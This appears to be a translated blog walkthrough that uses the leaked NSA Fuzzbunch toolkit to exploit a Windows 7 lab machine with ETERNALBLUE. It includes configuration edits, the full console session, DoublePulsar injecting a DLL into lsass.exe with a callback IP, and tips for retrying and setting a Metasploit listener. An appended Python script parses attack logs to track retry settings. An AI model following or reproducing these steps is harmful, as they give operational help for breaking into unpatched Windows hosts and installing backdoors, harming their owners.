0x01 Download the NSA toolkit
NSA toolkit download
The attack scripts require a 32-bit Python 2.6 environment, so the attack machine also needs the following two installers:
python-2.6.6.msi, pywin32-221.win32-py2.6.exe
0x02 Modify the NSA toolkit configuration files
- Edit the file C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py
Comment out line 72, addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin), so that load_plugins reads as follows:
def load_plugins(fb):
    fb.io.pre_input(None)
    fb.io.print_msg("Loading Plugins")
    fb.io.post_input()
    addplugins(fb, "Exploit", EXPLOIT_DIR, EDFPlugin)
    addplugins(fb, "Payload", PAYLOAD_DIR, EDFPlugin)
    addplugins(fb, "Touch", TOUCH_DIR, EDFPlugin)
    addplugins(fb, "ImplantConfig", IMPLANT_DIR, EDFPlugin)
    # line 72: ListeningPost plugins disabled
    #addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)
    addplugins(fb, "Special", SPECIAL_DIR, DAVEPlugin, DeployableManager)
- Edit the file C:\Users\Administrator\Desktop\shadowbroker-master\windows\Fuzzbunch.xml
Change the Resources path on line 19 and the logs path on line 24 to the directory where the toolkit is currently stored:
<t:parameter name="ResourcesDir"
             description="Absolute path of the Resources Directory"
             type="String"
             default="C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources"/>
<t:parameter name="LogDir"
             description="Absolute path of an Initial Log Directory"
             type="String"
             default="C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs"/>
0x03 Run fb.py to carry out the ETERNALBLUE attack
Target machine: Windows 7/2008, 10.130.3.246
Attack machine: Windows 10, 10.130.3.243
Attack machine: Kali, 10.130.3.242
Run the file C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py:
Microsoft Windows [版本 10.0.18363.1316]
(c) 2019 Microsoft Corporation。保留所有权利。
C:\Users\Administrator\Desktop\shadowbroker-master\windows>python fb.py
--[ Version 3.5.1
[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs
[*] Autorun ON
ImplantConfig Autorun List
==========================
0) prompt confirm
1) execute
Exploit Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Special Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Payload Autorun List
====================
0) apply
1) prompt confirm
2) execute
[+] Set FbStorage => C:\Users\Administrator\Desktop\shadowbroker-master\windows\storage
[*] Retargetting Session
[?] Default Target IP Address [] : 10.130.3.246
[?] Default Callback IP Address [] : 10.130.3.242
[?] Use Redirection [yes] : no
[?] Base Log directory [C:\Users\Administrator\Desktop\shadowbroker-master... (plus 13 characters)] :
[*] Checking C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs for projects
Index Project
----- -------
0 Create a New Project
[?] Project [0] :
[?] New Project Name :
[?] Set target log directory to 'C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs\z10.130.3.246'? [Yes] :
[*] Initializing Global State
[+] Set TargetIp => 10.130.3.246
[+] Set CallbackIp => 10.130.3.242
[!] Redirection OFF
[+] Set LogDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs\z10.130.3.246
Module: Global Variables
========================
Name Value
---- -----
ResourcesDir C:\Users\Administrator\Desktop\shadowbroker-master
\windows\Resources
Color True
ShowHiddenParameters False
FbStorage C:\Users\Administrator\Desktop\shadowbroker-master
\windows\storage
LogDir C:\Users\Administrator\Desktop\shadowbroker-master
\windows\logs\z10.130.3.246
TargetIp 10.130.3.246
CallbackIp 10.130.3.242
TmpDir C:\Users\Administrator\Desktop\shadowbroker-master
\windows\logs\z10.130.3.246
NetworkTimeout 60
fb >
fb > use Eternalblue
[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.130.3.246
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue
Module: Eternalblue
===================
Name Value
---- -----
NetworkTimeout 60
TargetIp 10.130.3.246
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [10.130.3.246] :
[*] TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] :
[*] VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.
[?] VerifyTarget [True] :
[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] :
[*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.
[?] MaxExploitAttempts [3] :
[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.
[?] GroomAllocations [12] :
[*] Target :: Operating System, Service Pack, and Architecture of target OS
0) XP Windows XP 32-Bit All Service Packs
*1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs
[?] Target [1] :
[!] Preparing to Execute Eternalblue
[*] Mode :: Delivery mechanism
*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH
[?] Mode [0] : 1
[+] Run Mode: FB
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.130.3.246] :
[?] Destination Port [445] :
[+] (TCP) Local 10.130.3.246:445
[+] Configure Plugin Remote Tunnels
Module: Eternalblue
===================
Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 10.130.3.246
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target WIN72K8R2
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (39 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
0x00000020 50 61 63 6b 20 31 00 Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
..........DONE.
DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
[+] Backdoor NOT installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Trying again with 17 Groom Allocations
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (39 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
0x00000020 50 61 63 6b 20 31 00 Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
.....DONE.
[+] Sending final SMBv2 buffers......DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded
fb Payload (Doublepulsar) > use Doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.130.3.246
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 10.130.3.246
TargetPort 445
DllPayload C:\x86.dll
DllOrdinal 1
ProcessName lsass.exe
ProcessCommandLine
Protocol SMB
Architecture x64
Function RunDLL
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [10.130.3.246] :
[*] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :
[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] :
[*] Architecture :: Architecture of the target OS
0) x86 x86 32-bits
*1) x64 x64 64-bits
[?] Architecture [1] :
[*] Function :: Operation for backdoor to perform
0) OutputInstall Only output the install shellcode to a binary file on disk.
1) Ping Test for presence of backdoor
*2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove's backdoor from system
[?] Function [2] :
[*] DllPayload :: DLL to inject into user mode
[?] DllPayload [C:\x86.dll] : C:\\x64.dll
[+] Set DllPayload => C:\\x64.dll
[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] :
[*] ProcessName :: Name of process to inject into
[?] ProcessName [lsass.exe] :
[*] ProcessCommandLine :: Command line of process to inject into
[?] ProcessCommandLine [] :
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.130.3.246] :
[?] Destination Port [445] :
[+] (TCP) Local 10.130.3.246:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 10.130.3.246
TargetPort 445
DllPayload C:\x64.dll
DllOrdinal 1
ProcessName lsass.exe
ProcessCommandLine
Protocol SMB
Architecture x64
Function RunDLL
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x33521E64
SMB Connection string is: Windows 7 Ultimate 7601 Service Pack 1
Target OS is: 7 x64
Target SP is: 1
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded

If the Eternalblue attack fails here, try it a few more times.

Once it succeeds, use Doublepulsar to carry out the attack.

Don't forget to set the msf listener to x64, otherwise the session will die.
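The transcript above records two exploit attempts: the first, with the default GroomAllocations of 12, ends in the FAIL banner, and the retry with 17 ends in WIN. The parser below is an added example (not part of the original post or of the Fuzzbunch tooling) that pulls that outcome out of a session log and decodes the "CORE raw buffer dump" rows back into the SMB NativeOS string that VerifyTarget compares against the selected Target; SAMPLE_LOG is a constructed excerpt of the session shown here, and the parser also copes with the second dump a retry prints.

```python
import re
# Constructed excerpt of the Fuzzbunch transcript shown on this page, in the
# original order; only the lines the parser needs are kept.
SAMPLE_LOG = """\
[+] Set TargetIp => 10.130.3.246
GroomAllocations 12
[*] CORE raw buffer dump (39 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
0x00000020 50 61 63 6b 20 31 00 Pack 1.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Trying again with 17 Groom Allocations
[+] Ping returned Target architecture: x64 (64-bit)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
"""
HEX_ROW = re.compile(r"^0x[0-9a-fA-F]{8}\s+((?:[0-9a-fA-F]{2}\s)+)")
GROOM = re.compile(r"^GroomAllocations\s+(\d+)")
RETRY = re.compile(r"Trying again with (\d+) Groom Allocations")
TARGET = re.compile(r"Set TargetIp => (\S+)")
ARCH = re.compile(r"Target architecture: (\S+)")

def decode_core_dump(text):
    """SMB NativeOS string (what VerifyTarget checks) from the last CORE dump's hex column."""
    raw, in_dump = bytearray(), False
    for line in text.splitlines():
        if "CORE raw buffer dump" in line:
            raw, in_dump = bytearray(), True   # a retry prints the dump again
            continue
        m = HEX_ROW.match(line) if in_dump else None
        if not m:
            in_dump = False                    # first non-hex row ends the dump
            continue
        raw += bytes.fromhex(m.group(1))       # the ASCII column is ignored
    return raw.decode("ascii").rstrip("\x00")

def summarize_session(text):
    """Target, architecture, decoded OS string and (groom_allocations, outcome) per attempt."""
    info = {"target": None, "arch": None, "os": decode_core_dump(text), "attempts": []}
    groom = None
    for line in text.splitlines():
        for key, rx in (("target", TARGET), ("arch", ARCH)):
            m = rx.search(line)
            if m:
                info[key] = m.group(1)
        m = GROOM.match(line) or RETRY.search(line)
        if m:
            groom = int(m.group(1))            # allocation count for the next attempt
        if line.startswith("=-=") and ("FAIL" in line or "WIN" in line):
            info["attempts"].append((groom, "WIN" if "WIN" in line else "FAIL"))
    return info
```

Running summarize_session over a complete fb.py log gives the groom count of every attempt, which is the number to watch when a run needs several retries as the note above describes.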